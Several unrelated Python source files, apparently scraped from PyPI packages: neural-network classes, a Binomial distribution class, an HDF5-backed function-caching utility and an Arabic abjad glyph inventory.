        in_channels = 1, out_elements = 2, layer_channels = 64, kernel_size = 3,
        pooling_size = 2, keep_prob = 0.5, conv_block = 'conv', multi_arms = "shared",
        multi_arms_combine = cat, res_type = bt.add, activation_function = nn.ReLU,
        active_args = {}, initializer = "normal(0, 0.1)", with_softmax = True):
        '''
        ::paramerters:
            dimension (int): The dimension of the images. For conventional VGG, it is 2.
            blocks (int): The number of the downsampling blocks. The conventional VGG has 5 blocks.
            conv_num (int or list of length 'blocks'): The number of continuous convolutions in one block. In VGG, this is [2, 2, 3, 3, 3]. If the numbers for all blocks are the same, one can use one integer.
            padding (int or str): Indicate the type of padding used. In a conventional VGG, padding is 'SAME' indicating .
            in_channels (int): The number of channels for the input. In a conventional VGG, it should be 1.
            out_elements (int): The number of channels for the output, as the number of classification. In a conventional VGG, it should be 1000 for 1000 classes.
            layer_channels (int or list of length 'blocks'): The number of channels for each block. In a VGG, it should be [64, 128, 256, 512, 512].
                Or else, a function may be provided to compute the output channels given the block index (-1 ~ 2 * depth + 1).
            kernel_size (int): The size of the convolution kernels. In a conventional U-Net, it should be 3.
            pooling_size (int): The size of the pooling kernels. In a conventional U-Net, it should be 2.
            // keep_prob (float): The keep probability for the dropout layers.
            conv_block (str): A string with possible values in ('conv', 'dense', 'residual'), indicating which kind of block the U-Net is using: normal convolution layers, DenseBlock or ResidualBlock.
            multi_arms (str): A string with possible values in ('shared(2)', 'seperate(2)'), indicating which kind of encoder arms are used.
            multi_arms_combine (function): The combining type for multi-arms. See skip_type for details.
            skip_type (function): The skip type for the skip connections. The conventional U-Net has a skip connect of catenation (cat). Other possible skip types include torch.mul or torch.add.
            res_type (function): The combining type for the residual connections. It should be torch.add in most occasions.
            activation_function (class): The activation function used after the convolution layers. nn.ReLU by default.
            active_args (dict): The arguments for the activation function. {} by default.
            initializer (str): A string indicating the initialing strategy. Possible values are normal(0, 0.1) or uniform(-0.1, 0.1) or constant(0) (all parameters can be changed)
            with_softmax (bool): Whether a softmax layer is applied at the end of the network.
            cum_layers (list): A list consisting two numbers [n, m] indicating that the result would be a summation of the upsamples of the results of the nth to the mth (included) blocks, block_numbers are in range 0 ~ 2 * depth. The negative indices are allowed to indicate the blocks in a inversed order with -1 representing the output for the last block.
        '''
        depth = blocks - 1
        # Expand an int layer_channels into a geometric ramp from
        # in_channels up to the given maximum; the decoder entries are
        # zero-filled placeholders since the decoder is never built.
        if isinstance(layer_channels, int):
            maxlc = layer_channels
            layer_channels = [in_channels]
            multiplier = int(math.pow(maxlc / in_channels, 1 / (depth + 1)))
            for i in range(depth):
                layer_channels.append(layer_channels[-1] * multiplier)
            layer_channels.append(maxlc)
            layer_channels.extend([0] * depth)
            layer_channels.append(out_elements)
        super().__init__(dimension = dimension, depth = depth, conv_num = conv_num,
            padding = padding, in_channels = in_channels, out_channels = out_elements,
            block_channels = layer_channels, kernel_size = kernel_size,
            pooling_size = pooling_size, keep_prob = keep_prob, conv_block = conv_block,
            multi_arms = multi_arms, multi_arms_combine = multi_arms_combine, skip_type = None,
            res_type = res_type, activation_function = activation_function, active_args = active_args,
            initializer = initializer, with_softmax = with_softmax, cum_layers = depth)
    def forward(self, x):
        # Run the encoder with softmax temporarily disabled, average over
        # all spatial positions, then apply softmax (if enabled) on the
        # resulting class vector.
        wsm = self.with_softmax
        self.with_softmax = False
        if wsm: r = self.softmax(super().forward(x).flatten(2).mean(-1))
        else: r = super().forward(x).flatten(2).mean(-1)
        self.with_softmax = wsm
        return r
class FCN(nn.Module):
    """Fully-connected network (multi-layer perceptron) with dropout.

    The layer widths ramp up geometrically from ``in_elements`` to
    ``layer_elements`` and back down to ``out_elements``.
    """
    # Channel-wise softmax over dim 1, wrapped as a module.
    class Softmax(nn.Module):
        def forward(self, x): return nn.functional.softmax(x, 1)
    def __init__(self, layers = 4, in_elements = 1, out_elements = 2, layer_elements = 64,
        keep_prob = 0.5, activation_function = nn.ReLU, active_args = {},
        initializer = "normal(0, 0.1)", with_softmax = True):
        '''
        ::parameters:
            layers (int): The number of fully connected layers.
            in_elements (int): The number of input features.
            out_elements (int): The number of output elements, e.g. classes.
            layer_elements (int or list or callable): The widths of the layers; an int
                gives the maximal (middle) width of an automatic up-then-down ramp.
            keep_prob (float): Value passed to nn.Dropout.
                NOTE(review): nn.Dropout's argument is the probability of *dropping*
                a unit, so passing a keep-probability here looks inverted -- confirm.
            activation_function (class): Activation applied between layers.
            active_args (dict): Arguments for the activation function.
            initializer (str): Weight-initialization spec parsed by parse().
            with_softmax (bool): Whether to append a softmax after the last layer.
        '''
        # Fix: nn.Module.__init__ must run before any attribute or submodule
        # assignment below, otherwise registering self.struct fails.
        super().__init__()
        if isinstance(layer_elements, int):
            maxlc = layer_elements
            layer_elements = [in_elements]
            # Geometric growth factor; math.pow keeps this consistent with
            # CNN.__init__ (previously bt.pow, same scalar value).
            multiplier = int(math.pow(maxlc / in_elements, 1 / (layers // 2 + 1)))
            for i in range(layers // 2 - 1):
                layer_elements.append(layer_elements[-1] * multiplier)
            layer_elements.append(maxlc)
            # Mirror the ramp back down; even layer counts repeat the peak
            # width once, odd counts do not.
            if layers % 2 == 0: layer_elements.extend(layer_elements[-2::-1])
            else: layer_elements.extend(layer_elements[::-1])
            layer_elements[-1] = out_elements
        if isinstance(layer_elements, list):
            lc = layer_elements.copy()
            layer_elements = lambda i: lc[i]
        self.layers = []
        for l in range(layers):
            fcl = nn.Linear(layer_elements(l), layer_elements(l+1))
            initialize_model, initialize_params = parse(initializer)
            eval('nn.init.%s_' % initialize_model)(fcl.weight, *initialize_params)
            self.layers.append(fcl)
            # Hidden layers get activation + dropout; the final layer gets
            # only the optional softmax.
            if l < layers - 1:
                self.layers.append(activation_function(**active_args))
                self.layers.append(nn.Dropout(keep_prob))
            elif with_softmax:
                self.layers.append(self.Softmax())
        self.struct = nn.Sequential(*self.layers)
    def forward(self, x):
        """Apply the stacked linear/activation/dropout layers to x."""
        return self.struct(x)
if __name__ == "__main__":
    # Smoke test: build a small 3D U-Net and push a random batch through it.
    # unet = U_Net(multi_arms="seperate(3)", block_channels=16)
    # print(unet(bt.rand(10, 3, 100, 100)).size())
    # print(*[x + ' ' + str(unet[i].size()) for x, i in unet], sep='\n')
    unet = U_Net(
        dimension=3,
        in_channels=2,
        out_channels=3,
        block_channels=4,
        with_softmax=False,
        initializer="normal(0.0, 0.9)",
        # conv_block='dense',
        # conv_num=4,
        # active_args={'inplace': True}
    )
    print(unet(bt.rand(10, 2, 50, 50, 50)).size())
    # Print the name and output size of every cached intermediate result.
    print(*[x + ' ' + str(unet[i].size()) for x, i in unet], sep='\n')
|
PypiClean
|
/distributions_lz-0.1.tar.gz/distributions_lz-0.1/distributions_lz/Binomialdistribution.py
|
import math
import matplotlib.pyplot as plt
from .Generaldistribution import Distribution
class Binomial(Distribution):
    """ Binomial distribution class for calculating and
    visualizing a Binomial distribution.

    Attributes:
        mean (float) representing the mean value of the distribution
        stdev (float) representing the standard deviation of the distribution
        data_list (list of floats) a list of floats to be extracted from the data file
        p (float) representing the probability of an event occurring
        n (int) number of trials
    """
    def __init__(self, prob=.5, size=20):
        # n and p must be set before Distribution.__init__ runs because
        # calculate_mean/calculate_stdev read them.
        self.n = size
        self.p = prob
        Distribution.__init__(self, self.calculate_mean(), self.calculate_stdev())
    def calculate_mean(self):
        """Calculate the mean (n * p) from p and n.

        Returns:
            float: mean of the distribution
        """
        self.mean = self.p * self.n
        return self.mean
    def calculate_stdev(self):
        """Calculate the standard deviation sqrt(n * p * (1 - p)) from p and n.

        Returns:
            float: standard deviation of the distribution
        """
        self.stdev = math.sqrt(self.n * self.p * (1 - self.p))
        return self.stdev
    def replace_stats_with_data(self):
        """Recalculate p and n from the data set stored in self.data.

        n becomes the number of recorded trials and p the observed success
        frequency (self.data is expected to hold 0/1 outcomes); mean and
        stdev are refreshed accordingly.

        Returns:
            float: the p value
            float: the n value
        """
        self.n = len(self.data)
        self.p = 1.0 * sum(self.data) / len(self.data)
        self.mean = self.calculate_mean()
        self.stdev = self.calculate_stdev()
        # Fix: the documented (p, n) return value was previously missing.
        return self.p, self.n
    def plot_bar(self):
        """Output a bar chart of the instance's expected outcome counts using
        the matplotlib pyplot library.

        Returns:
            None
        """
        plt.bar(x = ['0', '1'], height = [(1 - self.p) * self.n, self.p * self.n])
        plt.title('Bar Chart of Data')
        plt.xlabel('outcome')
        plt.ylabel('count')
    def pdf(self, k):
        """Probability mass at k successes for the binomial distribution.

        Args:
            k (int): number of successes, 0 <= k <= n

        Returns:
            float: probability of exactly k successes in n trials
        """
        # math.comb is the exact binomial coefficient; the previous
        # factorial-ratio form was equivalent but less robust for large n.
        return math.comb(self.n, k) * (self.p ** k) * (1 - self.p) ** (self.n - k)
    def plot_bar_pdf(self):
        """Plot the pmf of the binomial distribution over k = 0..n.

        Returns:
            list: x values for the pdf plot
            list: y values for the pdf plot
        """
        x = []
        y = []
        # calculate the x values to visualize
        for i in range(self.n + 1):
            x.append(i)
            y.append(self.pdf(i))
        # make the plots
        plt.bar(x, y)
        plt.title('Distribution of Outcomes')
        plt.ylabel('Probability')
        plt.xlabel('Outcome')
        plt.show()
        return x, y
    def __add__(self, other):
        """Add together two Binomial distributions with equal p.

        Args:
            other (Binomial): Binomial instance

        Returns:
            Binomial: distribution of the combined n = n1 + n2 trials

        Raises:
            AssertionError: if the two distributions' p values differ
        """
        # Binomials only add cleanly when both share the same success
        # probability; the previous try/except around this assert only
        # re-raised and has been removed.
        assert self.p == other.p, 'p values are not equal'
        result = Binomial()
        result.n = self.n + other.n
        result.p = self.p
        result.calculate_mean()
        result.calculate_stdev()
        return result
    def __repr__(self):
        """Output the characteristics of the Binomial instance.

        Returns:
            string: characteristics of the Binomial
        """
        return "mean {}, standard deviation {}, p {}, n {}".\
        format(self.mean, self.stdev, self.p, self.n)
|
PypiClean
|
/cgptoolbox-0.1.2.zip/cgptoolbox-0.1.2/cgp/utils/hdfcache.py
|
# for merging iterators
import itertools
from contextlib import nested
from glob import glob
import os
from ..utils.poormanslock import Lock
import shutil
# for handling numpy record arrays and HDF tables
import tables as pt
import numpy as np
from ..utils.argrec import autoname
# for decorating
import inspect
from functools import wraps
import time
# logging facilities, useful for debugging
import logging
# # To use Gael Varoquaux' joblib.hash() rather than the built-in one.
# try:
# from joblib import hash as ahash
# except ImportError:
# pass
# Module-level logger with a tab-delimited stderr handler, useful for
# debugging cache behaviour.
log = logging.getLogger("hdfcache")
log.addHandler(logging.StreamHandler())
# tab-delimited format string,
# see http://docs.python.org/library/logging.html#formatter-objects
fmtstr = "%(" + ")s\t%(".join(
    "asctime levelname name lineno process message".split()) + ")s"
# Install the tab-delimited formatter on the handler added just above.
log.handlers[0].setFormatter(logging.Formatter(fmtstr))
def ahash(x):
    """
    Hash the raw data of a Numpy array

    The input will be converted to a Numpy array if possible.
    The shape of the array does not enter into the hash; only the raw
    bytes of the underlying buffer do, so arrays with equal buffers
    (e.g. reshaped views of the same data) hash equal.

    >>> x = np.arange(5)
    >>> y = np.arange(5)
    >>> ahash(x) == ahash(y) == ahash(range(5))
    True
    """
    x = np.asarray(x)
    # Fix: hash(x.data) relied on Python 2 buffer objects; on Python 3,
    # x.data is a memoryview, which is unhashable for most dtypes even
    # when read-only.  Hashing the raw bytes preserves the contract
    # (equal raw data => equal hash) on both versions.
    return hash(x.tobytes())
class NoHdfcache(object):
    """A caricature of a caching decorator that performs no caching at all."""
    def __init__(self, filename):
        """Accept (and ignore) the shared-resource filename."""
        pass
    def cache(self, func):
        """
        Return *func* unchanged -- a do-nothing stand-in for a caching
        decorator implemented as an instance method.

        >>> nohdfcache = NoHdfcache("dummy.filename")
        >>> @nohdfcache.cache
        ... def f(x): return x * x
        >>> @nohdfcache.cache
        ... def g(y): return y * y * y
        >>> f(2)
        4
        >>> g(3)
        27
        """
        return func
class DictHdfcache(object):
"""Prototype of caching using a shared resource (a dict)"""
    def __init__(self, filename):
        """Initialize a single dict that will hold multiple caches

        The filename argument is accepted for interface compatibility
        with the HDF-backed implementation but is not used here.
        """
        self.d = {} # owns all the caches, similar to a HDF5 File object
        self.argspec = {} # prototype for making "args" Table
        self.output_type = {} # deferring details of storage to later
def cache(self, func):
"""
Cache a function, using a resource in scope of an object instance
Note that "self" is in scope of the decorator method, providing access
to shared resources. By contrast, the scope of "func" is limited to
each decoration. Each decoration involves a single call to cache().
It initializes any sub-resources specific to "func".
Finally, it defines the actual wrapper as a plain function, but one
whose scope includes both "self" and "func".
Access to "self" preserves information (the cache) between calls to the
wrapped function. Because it is a plain function, it can adopt the
docstring of func by use of @wraps(func).
Details of the caching can be deferred until the required information
is available, like knowing the dtype of an output array before creating
a corresponding HDF table.
Verifying what's going on...
>>> dicthdfcache = DictHdfcache("dummy.filename")
>>> @dicthdfcache.cache
... def f(x): return x * x
cache: initializing resources for a decorated function
>>> f(2)
cache: computed f 2 => 4
cache: deferred initialization
4
>>> f(3)
cache: computed f 3 => 9
9
>>> f(3)
cache: returning cached value
9
Create another cache using the same resource (a dict); the end result
is shown below.
>>> @dicthdfcache.cache
... def g(y): return y * y * y
cache: initializing resources for a decorated function
>>> g(3)
cache: computed g 3 => 27
cache: deferred initialization
27
Here's the dictionary with the two caches.
>>> srt = sorted(dicthdfcache.d.items(), key=lambda x: x[0].__name__)
>>> for k, v in srt:
... print k, sorted(v.items(), key=lambda x: x[-1])
<function f at 0x...> [(..., 4), (..., 9)]
<function g at 0x...> [(..., 27)]
A function with both required, default, and variable-length unnamed and
keyword arguments.
>>> @dicthdfcache.cache
... def h(a, b=10, *args, **kwargs): pass
cache: initializing resources for a decorated function
Here are the argument specifications, which could be used for deferred
specification of an "args" table.
>>> sorted(dicthdfcache.argspec.items(), key=lambda x: x[0].__name__)
[(<function f at 0x...>,
ArgSpec(args=['x'], varargs=None, keywords=None, defaults=None)),
(<function g at 0x...>,
ArgSpec(args=['y'], varargs=None, keywords=None, defaults=None)),
(<function h at 0x...>,
ArgSpec(args=['a', 'b'], varargs='args', keywords='kwargs',
defaults=(10,)))]
"""
print "cache: initializing resources for a decorated function"
self.d[func] = {} # nested dictionary, like a cache Group in a File
self.argspec[func] = inspect.getargspec(func)
@wraps(func)
def wrapper(input_): # pylint: disable=C0111
# ignoring the complications of hashing multiple arguments
key = ahash(input_)
if key in self.d[func]:
print "cache: returning cached value"
return self.d[func][key]
else:
output = func(input_)
print "cache: computed", func.__name__, input_, "=>", output
if not self.d[func]:
# If the func-specific nested dict is empty, we know that
# this is the first time func is evaluated. Now we can
# perform initialization that had to be deferred until
# we knew what kind of output func produces.
print "cache: deferred initialization"
self.output_type[func] = type(output) # just an example
self.d[func][key] = output # store value for later retrieval
return output
return wrapper
class HdfcacheException(Exception):
    """Raised by :class:`Hdfcache` when caching cannot proceed."""
class Hdfcache(object):
    """HDF file wrapper with function caching decorator"""

    def __init__(self, filename, where="/", filters=pt.Filters(complevel=1),
                 mode="a", withflagfile=True,
                 *args, **kwargs):
        """
        Constructor for HDF cache object.

        Arguments "filename", "filters", "mode" are passed to Tables.openFile().
        Argument "where" identifies a parent group for all the function caches.
        The boolean argument "withflagfile" says whether to create a flag file
        with the extension ".delete_me_to_stop" that indicates that the process
        is running. Deleting or renaming that file will raise an exception at a
        time when no function is being evaluated, ensuring clean exit and
        flushing of buffers.
        """
        # The file is opened lazily (see the "file" property), so only the
        # arguments are stored here; the merged kwargs are replayed into
        # pt.openFile() on first access.
        kwargs["filename"] = filename
        kwargs["mode"] = mode
        kwargs["filters"] = filters
        self._file = None
        self.where = where
        self.fileargs = args
        self.filekwargs = kwargs
        self.withflagfile = withflagfile
        if withflagfile:
            self.flagfilename = filename + ".delete_me_to_stop"
        self.incontext = False

    @property
    def file(self): #@ReservedAssignment
        """
        File object for an HDF cache, see Tables.File in PyTables.

        The file is created if it doesn't exist, reopened if it has been closed.
        """
        # NOTE(review): pt.openFile / isopen are the PyTables 2.x API
        # (renamed open_file in PyTables 3.x) — confirm pinned version.
        if not (self._file and self._file.isopen):
            self._file = pt.openFile(*self.fileargs, **self.filekwargs)
            log.debug("Opened cache file")
        return self._file

    def group(self, funcname):
        """Dictionary of HDF parent groups for each function."""
        # Open-if-exists-else-create, EAFP style.
        try:
            return self.file.getNode(self.where, funcname)
        except pt.NoSuchNodeError:
            return self.file.createGroup(self.where, funcname, createparents=True)

    def __enter__(self):
        """
        Enter the context of a with statement, optionally creating flag file.

        This doctest tests the flag file functionality. The flag file is
        deleted on the first pass through the function, causing an
        exception to be raised.

        >>> import tempfile, shutil, os
        >>> dtemp = tempfile.mkdtemp()
        >>> filename = os.path.join(dtemp, 'entertest.h5')
        >>> cacher = Hdfcache(filename)
        >>> @cacher.cache
        ... def f(x):
        ...     os.remove(cacher.flagfilename)
        ...     return x
        >>> with cacher:
        ...     while True:
        ...         y = f(0)
        Traceback (most recent call last):
        HdfcacheException: Flag file not found when calling <function f...
        """
        if self.withflagfile:
            self.incontext = True
            open(self.flagfilename, "w").close() # create empty file
        return self

    def __exit__(self, type_, value, tb):
        """
        Exit context of with statement, closing file and removing any flag file.
        """
        # Closing the file flushes PyTables' buffered Table writes.
        if self._file and self._file.isopen:
            self.file.close()
        if self.withflagfile and os.path.exists(self.flagfilename):
            self.incontext = False
            os.remove(self.flagfilename)

    def cache(self, func):
        """
        Decorator for function-specific caching of inputs and outputs

        This gets called once for each function being decorated, creating a
        new scope with HDF node objects specific to the decorated function.

        The Group object of the decorated function will currently not survive
        after the first with statement, because the File is closed and the
        node initialization code is never called again. I'll need to either put
        all of the "open if exist else create" stuff in the wrapper below, or
        encapsulate that into a separate object, which has to know about both
        file (in the scope of the "hdfcache" instance) and
        func (in the scope of the "cache" function).

        How to tell if a node is closed: _v_isopen
        Natural naming will open if required, so just need the group and always
        be explicit about group.hash, group.input, group.output.

        @todo: make iterator that buffers hashes so we can read many at a time
        using table.itersequence, see:
        http://wiki.umb.no/CompBio/index.php/HDF5_in_Matlab_and_Python
        """
        funcname = func.__name__
        group = self.group(funcname) # reopening file if required
        self.set_source_attr(group, func)
        # "uninitialized" is a sentinel key: it survives in hashdict until the
        # first wrapped call has loaded (or created) the on-disk hash table.
        hashdict = dict(uninitialized=True)
        @wraps(func)
        def wrapper(input_, *args, **kwargs): # pylint: disable=C0111
            # Cooperative shutdown: if the flag file disappeared, abort
            # before evaluating func, so buffers can be flushed cleanly.
            if self.withflagfile and self.incontext:
                if not os.path.exists(self.flagfilename):
                    msg = "Flag file not found when calling %s"
                    raise HdfcacheException(msg % func)
            input_ = autoname(input_)
            ihash = ahash(input_)
            group = self.group(funcname) # reopening file if required
            if "uninitialized" in hashdict:
                # Load the hash table, creating it if necessary
                try:
                    hash_ = group.hash
                    log.debug("Reading existing hashes")
                    # Pitfall: Iterating over the hash Table may return
                    # objects that are not strings and therefore will never
                    # match the input hash.
                    # See http://osdir.com/ml/python.pytables.user/2007-12/msg00002.html
                    # When iterating over the hash Table to compare hashes,
                    # the hash value must be extracted from each record.
                    # Iterating over the hash Table itself yields
                    # a Row instance with a single field called "_0". Thus:
                    # [row["_0"] for row in hash]
                    # is the desired list of strings.
                    # [row for row in hash]
                    # is a list of multiple copies of the last row.
                    # hash[:] is a 1-d recarray of strings, which iterates to
                    # tuples, so
                    # [h for (h,) in hash[:]] is the desired list of strings.
                    hashdict.update((h, i) for i, (h,) in enumerate(hash_[:]))
                except pt.NoSuchNodeError:
                    log.debug("Creating hash table for %s", func)
                    # Zero-row slice of the hashed input serves as the table
                    # descriptor; rename its single column to "hash".
                    hashdescr = autoname(ihash)[:0]
                    hashdescr.dtype.names = ["hash"]
                    hash_ = self.file.createTable(group, "hash", hashdescr)
                    self.set_source_attr(hash_, ahash)
                del hashdict["uninitialized"]
            if ihash in hashdict:
                log.debug("Cache hit %s: %s %s", func, ihash, input_)
                # Prevent ugly "ValueError: 0-d arrays can't be concatenated"
                # http://projects.scipy.org/numpy/wiki/ZeroRankArray
                return autoname(group.output[hashdict[ihash]])
            else:
                log.debug("Cache miss %s: %s %s", func, ihash, input_)
                timing = np.rec.fromarrays([[0.0], [0.0], [0.0]],
                    names=["seconds", "start", "end"])
                # NOTE(review): time.clock() was removed in Python 3.12;
                # time.perf_counter() is the modern equivalent — confirm
                # target interpreter before porting.
                timing.start = time.clock()
                output = autoname(func(input_, *args, **kwargs))
                timing.end = time.clock()
                timing.seconds = timing.end - timing.start
                if hashdict: # tables exist, but no record yet for this input
                    hash_ = group.hash
                    log.debug("Appending to input, output, and timing tables")
                    group.input.append(input_)
                    group.output.append(output)
                    group.timing.append(timing)
                else: # make tables from recarray descriptor, store first record
                    log.debug("Creating input, output, and timing tables")
                    self.file.createTable(group, "input", input_)
                    self.file.createTable(group, "output", output)
                    self.file.createTable(group, "timing", timing)
                # Record the row index of the new entry before appending the
                # hash itself, then return the freshly computed output.
                hashdict[ihash] = hash_.nrows
                hash_.append(autoname(ihash))
                return output
        # close the file so the decorator doesn't require a "with" statement
        self.file.close()
        return wrapper

    @staticmethod
    def set_source_attr(node, obj):
        """Store the source code of an object as an attribute of an HDF node."""
        # Only set once; getfile/getsource fail for built-ins (TypeError)
        # or when the source file is unavailable (IOError).
        if "sourcecode" not in node._v_attrs:
            try:
                node._v_attrs.sourcefile = inspect.getfile(obj)
                node._v_attrs.sourcecode = inspect.getsource(obj)
            except (TypeError, IOError):
                node._v_attrs.sourcefile = "built-in"
                node._v_attrs.sourcecode = ""
def hdfcat(pathname="*.h5", outfilename="concatenated.h5"):
    """
    Concatenate data scattered over many HDF files with equal layout.

    All HDF files matching pathname are concatenated into a new file denoted by
    outfilename. If the output file already exists, no action is taken. The
    function returns True if the output file was created and False otherwise.

    A lock is held while concatenating, so that work can be shared between
    multiple instances of a script (see the "grabcounter" module), while only
    one instance concatenates the results.

    Compression settings are inherited from the biggest file.

    NOTE: NEED TO ENSURE THAT ALL PROCESSES HAVE FINISHED FLUSHING HDF BUFFERS
    BEFORE CONCATENATING. See grabcounter.grabsummer().

    The use of iterators conserves memory, so this should work for arbitrarily
    large data sets. It is also quite IO-efficient due to PyTables' buffering
    of Table objects. The only limitation is perhaps that we need simultaneous
    handles to all input files. Also, this currently only concatenates tables,
    not arrays. (It might work out of the box, at least for VLArray.)

    Todo: Guard against adopting the structure of an unpopulated cache file
    left by job instances that arrived too late to do any work. Currently I use
    the biggest file and hope that's okay.

    Adapted from http://cilit.umb.no/WebSVN/wsvn/Cigene_Repository/CigeneCode/CompBio/cGPsandbox/h5merge.py

    The following doctests are more for testing than documentation.

    Distribute sample data over three HDF files in a temporary directory.

    >>> import tempfile
    >>> filename = os.path.join(tempfile.mkdtemp(), 'cachetest.h5')
    >>> a = np.rec.fromarrays([[0, 2, 1]], names="a")
    >>> b = np.rec.fromarrays([[11, 12, 10]], names="b")
    >>> def writedata(i):
    ...     with pt.openFile("%s.%s.h5" % (filename, i), "w") as f:
    ...         f.createTable(f.root, "a", a[i:i+1])
    ...         f.createTable("/group1", "b", b[i:i+1], createparents=True)
    ...         return str(f.root.a[:]) + " " + str(f.root.group1.b[:]) + " " + str(f)
    >>> for i in 0, 1, 2:
    ...     print "Part", i, writedata(i)
    Part 0 [(0,)] [(11,)] ...cachetest.h5.0.h5...
    / (RootGroup) ''
    /a (Table(1,)) ''
    /group1 (Group) ''
    /group1/b (Table(1,)) ''
    Part 1 [(2,)] [(12,)] ...cachetest.h5.1.h5...
    / (RootGroup) ''
    /a (Table(1,)) ''
    /group1 (Group) ''
    /group1/b (Table(1,)) ''
    Part 2 [(1,)] [(10,)] ...cachetest.h5.2.h5...
    / (RootGroup) ''
    /a (Table(1,)) ''
    /group1 (Group) ''
    /group1/b (Table(1,)) ''
    Part 0 [(0, 11)] ...cachetest.h5.0.h5...
    / (RootGroup) ''
    /data (Table(1,)) ''
    /group1 (Group) ''
    /group1/data (Table(1,)) ''
    Part 1 [(2, 12)] ...cachetest.h5.1.h5...
    / (RootGroup) ''
    /data (Table(1,)) ''
    /group1 (Group) ''
    /group1/data (Table(1,)) ''
    Part 2 [(1, 10)] ...cachetest.h5.2.h5...
    / (RootGroup) ''
    /data (Table(1,)) ''
    /group1 (Group) ''
    /group1/data (Table(1,)) ''

    Concatenate them together. (Note: The output is not sorted.)

    >>> hdfcat(filename + ".*.h5", filename + ".concatenated")
    True
    >>> with pt.openFile(filename + ".concatenated") as f:
    ...     print "Concatenated", str(f)
    Concatenated ...cachetest.h5.concatenated...
    / (RootGroup) ''
    /a (Table(3,)) ''
    /group1 (Group) ''
    /group1/b (Table(3,)) ''
    >>> with pt.openFile(filename + ".concatenated") as f:
    ...     np.testing.assert_equal(sorted(f.root.a.cols.a), (0, 1, 2))
    ...     np.testing.assert_equal(sorted(f.root.group1.b.cols.b), (10, 11, 12))

    False is returned if the output file already exists.

    >>> hdfcat(filename + ".*.h5", filename + ".concatenated")
    False
    """
    # NOTE(review): the doctest above contains a second set of expected
    # outputs ("/data" tables, "Part 0 [(0, 11)] ...") that corresponds to
    # no command in the example; it looks like stale output from an older
    # writedata() and would fail under doctest — confirm and prune.
    try:
        with Lock(outfilename + ".lock"):
            # Another process may have finished the merge while we waited
            # for the lock; then there is nothing to do.
            if os.path.exists(outfilename):
                return False
            # Find names of all files to be merged, sort by file size.
            infilenames = glob(pathname)
            infilenames.sort(key=os.path.getsize)
            bigfilename = infilenames.pop()
            # Open them all safely, using "with nested()"
            with nested(*(pt.openFile(i) for i in infilenames)) as fin:
                # Copy the biggest HDF file so we can append data
                # from the others into the same structure. This relies on
                # the biggest file having all the caches populated.
                # Don't use pt.copyFile() because it is slow on complex nested
                # columns, http://www.pytables.org/trac/ticket/260
                shutil.copy(bigfilename, outfilename)
                with pt.openFile(outfilename, "a") as fout:
                    def tablewalkers(f):
                        """List of iterators over nodes of HDF files."""
                        # tables.File.walkNodes is an iterator, here limited to Table's
                        return [fi.walkNodes(classname="Table") for fi in f]
                    # Remove HDF files with no actual content.
                    # Exhaust all the iterators and see which ones end up None.
                    for t in itertools.izip_longest(*tablewalkers(fin)):
                        pass
                    fin = [fi for fi, ti in zip(fin, t) if ti] # pylint: disable=W0631
                    # izip yields one node per file at a time,
                    # presumably in identical order.
                    # (The plus in "[fout] + fin" is list concatenation.)
                    for t in itertools.izip(*tablewalkers([fout] + fin)):
                        tout, tin = t[0], t[1:]
                        for ti in tin:
                            # Append the full recarray of each input table
                            # to the corresponding output table.
                            tout.append(ti[:])
            return True
    except IOError, exc:
        # Lock acquisition timing out means another process holds the lock;
        # report "did not concatenate" instead of crashing. Any other IOError
        # is a real problem and is re-raised.
        if "Timed out" in str(exc):
            return False
        else:
            raise
if __name__ == "__main__":
    # Command-line entry point: run the module doctests, optionally with
    # debug logging for the cache machinery.
    import optparse
    parser = optparse.OptionParser()
    parser.add_option("-o", "--filename", help="Name of output HDF5 file")
    parser.add_option("-v", "--verbose", action="store_true",
        help="Run doctests with verbose output")
    parser.add_option("--debug", action="store_true",
        help="Turn on debug logging for HDF cache")
    options, _args = parser.parse_args()
    if options.debug:
        log.setLevel(logging.DEBUG)
    import doctest
    # NOTE(review): the parsed --filename and --verbose options are never
    # used below; doctest.testmod() reads -v from sys.argv itself — confirm
    # whether the unused options are intentional placeholders.
    doctest.testmod(optionflags=doctest.ELLIPSIS|doctest.NORMALIZE_WHITESPACE)
|
PypiClean
|
/rasm_arch-1.2.5-py3-none-any.whl/rasm_arch/rasm_arch.py
|
import re
import sys
try:
import ujson as json
except ImportError:
import json
from io import TextIOBase
from string import whitespace, punctuation
from functools import partial, singledispatch
from importlib.resources import files
from dataclasses import dataclass
from itertools import groupby
from rasm_arch.util import SOURCE, ABJAD_MAPPING, PrivateFileError, pipe
@dataclass
class DATA:
    """ Inventory of characters in the Arabic abjad.

    Each single-letter class attribute (Q, N, Y, A, B, ...) is a string of
    all glyph variants (including Arabic presentation forms) that share one
    archigrapheme. The mapping tables and compiled regexes below are built
    from these inventories at class-creation time.
    """
    # Glyph inventories, one string per archigrapheme.
    Q = 'ٯࢥڧقڨﻕﻖ'
    N = 'ںنڻڼڹݧݨݩڽﻥﻦ'
    Y = 'ىیۍݷيېۑؠئؽێݵݶࢨࢩؾؿےۓݺݻﻯﻰﮮﮯﯼﯽﻲﮰﮱﺉﺊ'
    A = 'ٱأإآاٳٲݳݴٵﺃﺄﺇﺈﺁﺂﺍﺎﭐﭑﴼ'
    B = 'ࢬٮبݕࢠٻݐپڀݒٹݖݔتٺټݓثٽٿݑﻧﻨﯾﯿﻳﻴﺋﺌﺏﺐﺑﺒﭖﭗﭘﭙﺕﺖﺗﺘﺙﺚﺛﺜ'
    G = 'خحجچݮݼڃڄچڇݘݯځݲڿڂݗࢢڅﺝﺞﺟﺠﺡﺢﺣﺤﺥﺦﺧﺨﭺﭻﭼﭽ'
    R = 'رزړݛࢪڔڕڑڒۯݬږڗݫژڙݱﺭﺮﺯﺰﮊﮋ'
    D = 'دذڈډڊݚڍڈۮڋݙڌڎڏڐﺩﺪﺫﺬ'
    T = 'طظࢣڟﻁﻂﻃﻄﻅﻆﻇﻈ'
    C = 'صضڝۻڞﺹﺺﺻﺼﺽﺾﺿﻀ'
    S = 'سشڛݽݾښݭݜݰۺڜﺱﺲﺳﺴﺵﺶﺷﺸ'
    F = 'فﻑﻒڡڢݠڥݡڣڤڦࢤﻓﻔﻗﻘ'
    E = 'عغۼݝݟڠݞﻉﻊﻋﻌﻍﻎﻏﻐ'
    W = 'وۄۅࢫؤۆۇۈۉۏݸݹۊۋﻭﻮﺅﺆ'
    H = 'هھہەۀۂۿةۃﮤﮥﺓﺔﮦﮧﮨﮩﻪﻫﻬﮪﮫﮬﮭ'
    M = 'مݦݥࢧﻡﻢﻣﻤ'
